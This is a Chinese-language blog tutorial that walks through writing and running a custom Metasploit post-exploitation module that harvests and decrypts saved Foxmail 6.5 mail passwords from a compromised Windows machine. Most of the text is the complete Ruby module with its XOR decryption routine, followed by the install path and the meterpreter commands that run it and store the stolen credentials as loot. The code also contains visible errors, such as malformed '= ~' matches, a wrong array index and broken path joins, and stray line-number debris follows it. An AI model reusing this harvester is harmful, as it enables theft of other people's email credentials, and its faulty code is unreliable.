# Metasploit自定义收集登录凭证的后渗透模块
这里,我们以攻击Foxmail 6.5为例,将尝试对登录凭证进行解密,然后将它保存到数据库。
注意:运行这个脚本的前提是我们已经经过一系列的渗透拿下了目标Windows系统的System权限。
这里,我们编写脚本foxmail_decrypt_by_binghe.rb,内容如下:
##
# Author 冰河
# Date 2019-01-13
# Description 对foxmail 6.5的登录凭证进行解密
#
# 实现过程如下:
# 1.搜索用户的文件,查找当前用户的LocalAppData文件夹的准确位置
# 2.使用上面找到的文职,并将其与\VirtualStore\Program Files(x86)\Tencent\Foxmail\mail连接,建立一个mail文件夹的完整路径
# 3.列出mail文件夹下的所有文件夹,并将它们都保存到一个数组中。在mail文件夹中的每一个文件夹的名字都对应着一个邮箱用户名,比如binghe@formail.com就可以是mail文件夹下的一个文件夹
# 4.在mail文件夹下的accounts文件中查找Account.stg文件
# 5.通过读取Account.stg文件,会发现名为POP3Password的哈希
# 6.将这个值传递给解密方法,然后就会得到明文密码
# 7.将这些值保存到数据库
##
require 'msf/core'
class Metasploit3 < Msf::Post
include Msf::Post::Windows::Registry
include Msf::Post::File
include Msf::Auxiliary::Report
include Msf::Post::Windows::UserProfiles
def initialize(info={})
super(update_info(info,
'Name' => 'Foxmail 6.5 Credential Harvester',
'Description' => %q{
This module Finds and Decrypts Stored Foxmail 6.5 Credentials
},
'License' => MSF_LICENSE,
'Author' => ['binghe'],
'Platform' => ['Windows'],
'SessionTypes' => ['Meterpreter']
))
end
#程序入口
def run
profile = grap_user_profiles()
counter = 0
data_entry = ""
profile.each do |user|
if user['LocalAppData']
full_path = user['LocalAppData']
full_path = full_path + "\\VirtualStore\\Program Files(x86)\\Tencent\\Foxmail\\mail"
if directory?(full_path)
print_good("Fox Mail Installed, Enumerating Mail Accounts")
session.fs.dir.foreach(full_path) do |dir_list|
if dir_list = ~/@/
counter = counter + 1
full_path_mail = full_path + "" + dir_list + "" + "Account.stg"
if file?(full_path_mail)
print_good("Reading Mail Account #{counter}")
file_content = read_file(full_path_mail).split("\n")
file_content.each do |hash|
if hash = ~/POP3Password/
hash_data = hash.split("=")
hash_value = hash[1]
if hash_value.nil?
print_error("No Saved Password")
else
print_good("Decrypting Password for mail account: #{dir_list}")
#调用解密方法进行解密
decrypted_pass = decrypt(hash_value, dir_list)
data_entry << "Username:" + dir_list + "\t" + "Password:" + decrypted_pass + "\n"
end
end
end
end
end
end
end
end
end
store_loot("Foxmail Accounts", "text/plain", session, data_entry, "Fox.txt", "Fox Mail Accounts")
end
#解密方法
def decrypt(hash_real, dir_list)
decoded = ""
magic = Array[126,100,114,97,71,111,110,126]
fc0 = 90
size = (hash_real.length) / 2 - 1
index = 0
b = Array.new(size)
for i in 0 .. size do
b[i] = (hash_real[index, 2]).hex
index = index + 2
end
b[0] = b[0] ^ fc0
double_magic = magic + magic
d = Array.new(b.length - 1)
for i in 1 .. b.length - 1 do
d[i-1] = b[i] ^ double_magic[i - 1]
end
e = Array.new(d.length)
for i in 0 .. (d.length -1)
if(d[i] - b[i] < 0)
e[i] = d[i] + 255 - b[i]
else
e[i] = d[i] - b[i]
end
decoded << e[i].chr
end
print_good("Found Username #{dir_list} with Password: #{decoded}")
return decoded
end
end
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
然后我们将foxmail_decrypt_by_binghe.rb脚本上传到Kali的/usr/share/metasploit-framework/modules/post/windows/gather/credentials目录下。
在运行这个脚本之前,我们先使用Metasploit中的msftidy工具检查一下此脚本的语法是否正确。
在Kali的命令行执行如下命令:
/usr/share/metasploit-framework/tools/dev/msftidy.rb /usr/share/metasploit-framework/modules/post/windows/gather/credentials/foxmail_decrypt_by_binghe.rb
1
未输出任何信息,证明脚本正确。
接下来,我们的Kali命令行,执行如下命令:
meterpreter > background
msf > set SESSION 1
msf > use post/windows/gather/credentials/foxmail_decrypt_by_binghe
msf post(windows/gather/credentials/foxmail_decrypt_by_binghe) > show options
Module options (post/windows/gather/credentials/foxmail_decrypt_by_binghe):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
msf post(windows/gather/credentials/foxmail_decrypt_by_binghe) > run
1
2
3
4
5
6
7
8
9
10
11
12
2
3
4
5
6
7
8
9
10
11
12
# 写在最后
如果你觉得冰河写的还不错,请微信搜索并关注「 冰河技术 」微信公众号,跟冰河学习高并发、分布式、微服务、大数据、互联网和云原生技术,「 冰河技术 」微信公众号更新了大量技术专题,每一篇技术文章干货满满!不少读者已经通过阅读「 冰河技术 」微信公众号文章,吊打面试官,成功跳槽到大厂;也有不少读者实现了技术上的飞跃,成为公司的技术骨干!如果你也想像他们一样提升自己的能力,实现技术能力的飞跃,进大厂,升职加薪,那就关注「 冰河技术 」微信公众号吧,每天更新超硬核技术干货,让你对如何提升技术能力不再迷茫!
